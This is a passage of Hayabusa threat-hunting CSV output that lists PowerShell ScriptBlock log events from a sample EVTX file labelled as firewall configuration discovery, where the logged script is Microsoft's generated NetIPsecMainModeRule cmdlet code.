(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociat",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"edNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = 
${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdle",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in 
$InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('D",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, 
